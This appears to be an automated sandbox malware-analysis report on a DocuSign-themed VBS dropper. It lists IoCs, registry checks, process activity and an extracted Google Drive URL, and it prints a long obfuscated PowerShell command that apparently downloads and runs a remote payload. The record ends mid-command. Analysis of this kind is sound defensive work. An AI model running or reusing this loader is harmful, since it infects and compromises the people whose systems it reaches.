Analysis
-
max time kernel
145s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 12:07
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 49 372 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 2944 powershell.exe 1276 powershell.exe 372 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 3640 msedge.exe 3640 msedge.exe 1116 msedge.exe 1116 msedge.exe 1348 identity_helper.exe 1348 identity_helper.exe 1836 msedge.exe 1836 msedge.exe 1276 powershell.exe 1276 powershell.exe 1276 powershell.exe 372 powershell.exe 372 powershell.exe 372 powershell.exe 372 powershell.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 2944 powershell.exe 2944 powershell.exe 2944 powershell.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 828 msedge.exe 828 msedge.exe 828 msedge.exe 828 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 3880 taskmgr.exe Token: SeSystemProfilePrivilege 3880 taskmgr.exe Token: SeCreateGlobalPrivilege 3880 taskmgr.exe Token: SeDebugPrivilege 2944 powershell.exe Token: 33 3880 taskmgr.exe Token: SeIncBasePriorityPrivilege 3880 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 1116 msedge.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe 3880 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1116 wrote to memory of 2800 1116 msedge.exe 83 PID 1116 wrote to memory of 2800 1116 msedge.exe 83 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 4284 1116 msedge.exe 84 PID 1116 wrote to memory of 3640 1116 msedge.exe 85 PID 1116 wrote to memory of 3640 1116 msedge.exe 85 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86 PID 1116 wrote to memory of 2676 1116 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://glennmedina.com/eu.php1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa04a746f8,0x7ffa04a74708,0x7ffa04a747182⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:22⤵PID:4284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:82⤵PID:2676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:12⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:12⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:82⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:12⤵PID:2308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:12⤵PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5032 /prefetch:82⤵PID:1248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:12⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:12⤵PID:2352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3124 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:828
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3768
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4480
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2160
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\DocuSign01210021100\DocuSign01210021100.vbs"1⤵
- Checks computer location settings
PID:2268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nnqvs = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAApACcAMQ' + [char]66 + 'zAHAALgAzADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAA7ACcAOwApACAAKQAgACAAJwAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARAAgAEQAJwAnACAAIAAsACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'jAG8Abg' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAbg' + [char]66 + 'jAGEAbg' + [char]66 + 'jAHUAbgAuAGMAbw' + [char]66 + 'tAC8AYgAuAHQAeA' + [char]66 + '0ACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcAOwAgACkAIAApACcAJw' + [char]66 + '' + [char]66 + 'ACcAJwAsACcAJwCTIToAkyEnACcAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'yAC4ARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'zAFsAIAA9ACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAJwAgAD0AKwAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAAnADsAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIAAnACAAKwAgAGwARw' + [char]66 + 'mAFQAUwAkACAAKwAgACcAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAA9ACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAJwAgACAAPQAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAGwARw' + [char]66 + 'mAFQAUwAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAIAA9ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAbA' + [char]66 + 'HAGYAVA' + [char]66 + 'TACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAJwA4AEYAVA' + [char]66 + 'VACcAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAIA' + [char]66 + 'iAGsAdA' + [char]66 + 'kAHEAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + '2AFgAVQ' + [char]66 + 'WAFIAJAA7ACAAKQ' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAAgACwAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + 